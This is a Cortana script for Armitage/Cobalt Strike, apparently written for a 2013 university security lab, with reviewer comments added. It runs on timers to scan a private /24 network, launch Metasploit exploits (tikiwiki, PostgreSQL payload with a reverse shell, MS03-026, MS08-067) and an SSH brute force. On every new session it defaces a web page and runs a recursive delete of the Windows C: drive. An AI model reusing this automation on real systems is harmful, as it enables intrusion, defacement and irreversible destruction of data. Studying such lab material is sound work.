Cobalt Strike: cortana-script for IST511 Lab
# Cortana Script - "Time Bomb"
# For IST 511 2013
#
# Created by Patrick O'Connor
#
# NOTE(review): this is a Cortana (Sleep) script for Armitage/Cobalt Strike,
# not Perl. Everything below is driven by heartbeat events once the script is
# connected; every address used is inside the private 192.168.100.0/24 lab
# range, with 192.168.100.66 acting as the handler host (LHOST).
# Cortana's `when` registers a one-shot handler (fires at the first matching
# event, then unregisters) whereas `on` is persistent — TODO confirm against
# the Cortana manual. Read that way, the timeline is: first 5-minute beat =
# host sweep, first 10-minute beat = service scan, first 15-minute beat = all
# four exploit blocks at once.
# Raises the script's Sleep debug level by OR-ing in bit 256; what that bit
# enables is not shown here — TODO confirm in the Sleep docs.
debug(debug()| 256);
# Runs once the script is connected; all handlers below are armed from here.
on ready {
    # One-shot: host discovery (-sn, no port scan) of the whole /24, results
    # go into the Metasploit database. cmd_async does not wait for completion.
    when heartbeat_5m {
        #kick off nmap/ping sweep
        cmd_async("db_nmap --min-hostgroup 96 -T4 -n -sn 192.168.100.0/24");
    }
    # One-shot: full service/OS detection (-A) of the same /24. This and the
    # sweep above are unthrottled (-T4) and easy to spot on the wire.
    when heartbeat_10m {
        #kick off nmap/service detection
        cmd_async("db_nmap --min-hostgroup 96 -T4 -A -v -n 192.168.100.0/24");
    }
    # First of four one-shot handlers registered on the SAME 15-minute beat;
    # all four fire together. This one targets the Linux host .202 with
    # three modules in sequence on one console.
    when heartbeat_15m {
        # tikiwiki - metasploitable
        println("[*] Begin tikiwiki attack");
        $console = console();
        cmd($console, "use exploit/unix/webapp/tikiwiki_graph_formula_exec");
        # Bind-shell payload: the session is opened by connecting TO .202:9079.
        cmd_set($console, %(LHOST => "192.168.100.66",
                            RPORT => "80",
                            LPORT => "9079",
                            RHOST => "192.168.100.202",
                            PAYLOAD => "generic/shell_bind_tcp",
                            TARGET => "0"));
        cmd($console, "exploit -j");
        # Add some lulz to the index.html
        # Persistent handler: fires for every session synced from now on,
        # from ANY exploit block in this script — nothing here checks which
        # host or module produced the session. $1 is presumably the new
        # session id (the lambda captures it as $sid) — TODO confirm.
        on session_sync {
            println("[*] We have a session!");
            # One-shot: at the next 5-minute beat after the session appears,
            # append a line to the target's web-root index over the shell
            # session (s_cmd = shell session command).
            when ('heartbeat_5m', lambda({
                # $sid is the session ID when I was declared.
                println("[*] Adding lulz to index.html!");
                s_cmd($sid, "echo '<h1>lulz</h1><br>' >> /var/www/index.html");
            }, $sid => $1));
        }
        # SSH Brute Force
        # Online password guessing against .202:22 using the listed user file
        # with each username tried as its own password (USER_AS_PASS);
        # STOP_ON_SUCCESS=0 keeps going after the first valid login, so the
        # whole list is always exercised.
        println("[*] Begin SSH brute force attack");
        cmd($console, "use auxiliary/scanner/ssh/ssh_login");
        cmd_set($console, %(THREADS => "24",
                            RPORT => "22",
                            VERBOSE => "1",
                            USER_AS_PASS => "1",
                            STOP_ON_SUCCESS => "0",
                            BRUTEFORCE_SPEED => "8",
                            USER_FILE => "/opt/metasploit/msf3/data/wordlists/csusb_lab.txt",
                            RHOSTS => "192.168.100.202",
                            BLANK_PASSWORDS => "0"));
        cmd($console, "run -j");
        # PostgreSQL Payload from SSH Creds
        # Despite the heading, the credentials are hard-coded (postgres /
        # postgres) rather than taken from the SSH results above. Reverse
        # shell: the target connects back to .66:28430.
        println("[*] Begin PostgreSQL payload attack");
        cmd($console, "use exploit/linux/postgres/postgres_payload");
        cmd_set($console, %(LHOST => "192.168.100.66",
                            RPORT => "5432",
                            VERBOSE => "0",
                            LPORT => "28430",
                            RHOST => "192.168.100.202",
                            PAYLOAD => "generic/shell_reverse_tcp",
                            DATABASE => "template1",
                            TARGET => "0",
                            USERNAME => "postgres",
                            PASSWORD => "postgres"));
        cmd($console, "exploit -j");
    }
    # Second of the four 15-minute handlers: Windows host .101 via DCOM/RPC
    # on port 135 with a bind meterpreter on .101:20271.
    when heartbeat_15m {
        # Windows 2K3 DCOM Exploit ms03_026_dcom
        println("[*] Begin Windows 2K3 DCOM ms03_26_dcom attack");
        $console = console();
        cmd($console, "use exploit/windows/dcerpc/ms03_026_dcom");
        cmd_set($console, %(RHOST => "192.168.100.101",
                            PAYLOAD => "windows/meterpreter/bind_tcp",
                            LHOST => "192.168.100.66",
                            RPORT => "135",
                            LPORT => "20271",
                            TARGET => "0"));
        cmd($console, "exploit -j");
        # Lets let the computer cool down a bit before we "clean it"
        # Persistent handler, same caveat as above: fires for every session,
        # whichever block produced it, and only the first lambda argument
        # (presumably the session id) is used to pick the session.
        on session_sync {
            println("[*] We have a session!");
            when ('heartbeat_5m', lambda({
                # $sid is the session ID when I was declared.
                println("[*] Perform magic cleanup!");
                # Really useful command to free up some disk space.
                # The line above is sarcasm: this is a recursive, non-
                # interactive delete starting at the drive root, run through
                # the meterpreter session (m_exec). It destroys the target's
                # filesystem and is not reversible.
                m_exec($sid, "RMDIR /S /Q C:\\ ");
                println("[*] Pens down everyone.");
                # Force-kills the desktop shell on the target.
                m_exec($sid, "taskkill /f /im explorer.exe ");
            }, $sid => $1));
        }
    }
    # Third 15-minute handler: Windows host .102 via SMB (ms08_067). Only
    # RHOST and PAYLOAD are set; port and target selection use the module's
    # defaults.
    when heartbeat_15m {
        # Windows 2k3 SMB Exploit ms08_067_netapi
        println("[*] Begin Windows 2k3 ms08_67 attack");
        $console = console();
        cmd($console, "use exploit/windows/smb/ms08_067_netapi");
        cmd_set($console, %(RHOST => "192.168.100.102",
                            PAYLOAD => "windows/meterpreter/bind_tcp"));
        cmd($console, "exploit -j");
        # Lets let the computer cool down a bit before we "clean it"
        # Identical session handler to the block above; see the comments
        # there. Each registration adds another persistent handler, so a
        # single new session triggers every one of them.
        on session_sync {
            println("[*] We have a session!");
            when ('heartbeat_5m', lambda({
                # $sid is the session ID when I was declared.
                println("[*] Perform magic cleanup!");
                # Really useful command to free up some disk space.
                # Sarcasm — recursive, irreversible delete from the drive root.
                m_exec($sid, "RMDIR /S /Q C:\\ ");
                println("[*] Pens down everyone.");
                m_exec($sid, "taskkill /f /im explorer.exe ");
            }, $sid => $1));
        }
    }
    # Fourth 15-minute handler: same SMB module against .101, which the DCOM
    # block above already targets — two exploits race on the same host.
    when heartbeat_15m {
        # Windows XP SMB Exploit ms08_067_netapi
        println("[*] Begin Windows XP ms08_67 attack");
        $console = console();
        cmd($console, "use exploit/windows/smb/ms08_067_netapi");
        cmd_set($console, %(RHOST => "192.168.100.101",
                            PAYLOAD => "windows/meterpreter/bind_tcp"));
        cmd($console, "exploit -j");
        # Lets let the computer cool down a bit before we "clean it"
        # Same persistent session handler as the two blocks above.
        on session_sync {
            println("[*] We have a session!");
            when ('heartbeat_5m', lambda({
                # $sid is the session ID when I was declared.
                println("[*] Perform magic cleanup!");
                # Really useful command to free up some disk space.
                # Sarcasm — recursive, irreversible delete from the drive root.
                m_exec($sid, "RMDIR /S /Q C:\\ ");
                println("[*] Pens down everyone.");
                m_exec($sid, "taskkill /f /im explorer.exe ");
            }, $sid => $1));
        }
    }
    # NOTE(review): if Cortana's quit() disconnects this script from the
    # team server, none of the handlers armed above ever fire; if it only
    # ends the ready handler, they stay armed. TODO confirm which it is.
    quit();
}